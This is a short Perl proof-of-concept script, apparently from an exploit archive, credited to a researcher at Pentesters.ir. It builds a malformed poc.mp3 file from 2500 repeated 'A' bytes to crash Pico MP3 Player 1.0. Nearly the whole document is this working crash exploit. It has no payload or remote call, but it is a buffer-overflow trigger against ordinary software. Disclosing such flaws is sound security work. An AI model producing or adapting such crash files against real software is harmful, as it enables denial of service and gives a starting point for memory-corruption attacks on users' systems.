|
#!/usr/bin/perl
#--------------------------------------------------------------------------------------------#
# Found By: PLATEN * platen.secure [at] gmail.com
# Pico MP3 Player 1.0 (.mp3 File) Local File Crash PoC
# web : Blog: Www.platen.gigfa.com ~ Www.pentesters.IR
# Greetings: b3hz4d ~ Cru3l.b0y ~ Cdef3nder ~ Snake and all members in Pentesters.ir
#--------------------------------------------------------------------------------------------#
my $crash="A" x 2500;
open(myfile,'>>poc.mp3');
print myfile $crash;
|